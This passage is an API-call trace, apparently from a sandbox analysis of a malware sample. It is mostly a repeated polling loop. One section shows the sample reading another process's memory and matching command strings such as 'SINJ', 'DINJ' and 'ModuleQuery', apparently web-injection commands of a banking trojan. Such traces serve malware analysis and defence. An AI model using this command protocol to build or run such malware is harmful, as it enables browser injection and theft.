	[0245.437] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27786e0) returned 1
	[0245.437] Sleep (dwMilliseconds=0xbb8) 
	[0245.451] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.451] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.451] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.451] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.451] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.451] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.451] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27786e0) returned 1
	[0245.451] Sleep (dwMilliseconds=0xbb8) 
	[0245.467] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.467] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.467] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.467] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.467] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.467] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.467] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27786e0) returned 1
	[0245.467] Sleep (dwMilliseconds=0xbb8) 
	[0245.482] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.482] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.482] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.482] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.482] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.482] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.483] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27786e0) returned 1
	[0245.483] Sleep (dwMilliseconds=0xbb8) 
	[0245.508] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.508] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.508] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.508] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.508] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.508] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.508] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0245.508] Sleep (dwMilliseconds=0xbb8) 
	[0245.514] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.514] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.514] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.514] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.514] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.514] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.514] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0245.514] Sleep (dwMilliseconds=0xbb8) 
	[0245.530] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.530] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.530] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.530] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.530] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.530] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.530] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0245.530] Sleep (dwMilliseconds=0xbb8) 
	[0245.546] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.546] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.546] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.546] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.546] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.546] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.547] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0245.547] Sleep (dwMilliseconds=0xbb8) 
	[0245.560] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.560] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.561] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.561] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.561] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.561] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.561] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0245.561] Sleep (dwMilliseconds=0xbb8) 
	[0245.576] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.576] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.576] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.576] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.576] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.576] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.576] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0245.576] Sleep (dwMilliseconds=0xbb8) 
	[0245.592] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.592] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.592] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.592] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.592] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.592] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.592] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0245.592] Sleep (dwMilliseconds=0xbb8) 
	[0245.639] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.639] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.639] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.639] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.639] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.639] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.639] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0245.639] Sleep (dwMilliseconds=0xbb8) 
	[0245.685] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.685] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.685] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.685] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.685] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.686] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0245.686] Sleep (dwMilliseconds=0xbb8) 
	[0245.764] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.764] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.764] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.764] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.764] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.764] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.764] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789d8) returned 1
	[0245.764] Sleep (dwMilliseconds=0xbb8) 
	[0245.794] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.794] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.794] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.794] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.795] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.795] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.795] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778848) returned 1
	[0245.795] Sleep (dwMilliseconds=0xbb8) 
	[0245.810] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.810] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.810] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.810] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.810] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.810] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.811] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778848) returned 1
	[0245.811] Sleep (dwMilliseconds=0xbb8) 
	[0245.826] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.826] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.826] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.826] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.826] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.826] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.826] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778848) returned 1
	[0245.826] Sleep (dwMilliseconds=0xbb8) 
	[0245.842] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.842] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.842] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.842] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.842] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.842] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.842] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778848) returned 1
	[0245.843] Sleep (dwMilliseconds=0xbb8) 
	[0245.857] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.857] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.857] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.857] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.858] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.858] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.858] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778848) returned 1
	[0245.858] Sleep (dwMilliseconds=0xbb8) 
	[0245.947] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.947] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.947] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.947] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.947] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.948] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.948] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778848) returned 1
	[0245.948] Sleep (dwMilliseconds=0xbb8) 
	[0245.982] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0245.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0245.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0245.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0245.982] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0245.982] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225d20, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225d20*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0245.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0245.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1570
	[0245.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x27e1570, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0245.982] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0245.982] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0245.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0245.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27787f8
	[0245.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x27787f8, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0245.982] SetEvent (hEvent=0x474) returned 1
	[0245.982] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0245.982] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0245.982] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0245.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27789d8
	[0245.982] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0245.982] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0245.982] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0245.983] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0245.983] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0245.983] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1870
	[0245.983] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2778848, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xdf0) returned 0x664
	[0245.983] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778a00
	[0245.983] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.983] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.983] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.983] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.983] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.983] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0245.983] Sleep (dwMilliseconds=0xbb8) 
	[0245.997] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.997] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.997] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.997] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.997] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.997] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.997] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0245.997] Sleep (dwMilliseconds=0xbb8) 
	[0246.013] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.013] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.013] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.013] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.014] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.014] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.014] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0246.014] Sleep (dwMilliseconds=0xbb8) 
	[0246.028] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.028] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.028] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.028] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.028] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.028] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.028] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0246.029] Sleep (dwMilliseconds=0xbb8) 
	[0246.044] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.044] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.044] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.044] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.044] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.044] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.044] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777f60) returned 1
	[0246.044] Sleep (dwMilliseconds=0xbb8) 
	[0246.060] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.060] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.060] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.060] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.060] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.060] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.060] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777f60) returned 1
	[0246.060] Sleep (dwMilliseconds=0xbb8) 
	[0246.075] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.075] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.075] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.075] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.075] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.075] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.075] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778208) returned 1
	[0246.076] Sleep (dwMilliseconds=0xbb8) 
	[0246.091] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.091] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.091] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.091] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.092] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.092] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.092] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778208) returned 1
	[0246.092] Sleep (dwMilliseconds=0xbb8) 
	[0246.107] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.107] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.108] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.108] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.108] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.108] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.108] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778208) returned 1
	[0246.108] Sleep (dwMilliseconds=0xbb8) 
	[0246.122] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.122] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.123] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.123] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.123] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.123] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.123] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778208) returned 1
	[0246.123] Sleep (dwMilliseconds=0xbb8) 
	[0246.138] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.138] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.138] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.138] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.138] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.138] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778208) returned 1
	[0246.139] Sleep (dwMilliseconds=0xbb8) 
	[0246.154] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.154] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.154] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.154] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.154] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.154] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.154] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778208) returned 1
	[0246.154] Sleep (dwMilliseconds=0xbb8) 
	[0246.183] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.183] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.183] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.183] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.183] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.183] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.183] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778208) returned 1
	[0246.183] Sleep (dwMilliseconds=0xbb8) 
	[0246.184] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.184] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.184] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.184] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.184] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.184] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.185] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778208) returned 1
	[0246.185] Sleep (dwMilliseconds=0xbb8) 
	[0246.200] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.200] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.200] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.200] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.200] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.201] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.201] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778208) returned 1
	[0246.201] Sleep (dwMilliseconds=0xbb8) 
	[0246.216] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0246.216] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0246.216] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0246.216] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0246.216] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0246.216] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0246.216] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778208) returned 1
	[0246.216] Sleep (dwMilliseconds=0xbb8) 
	[0246.231] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
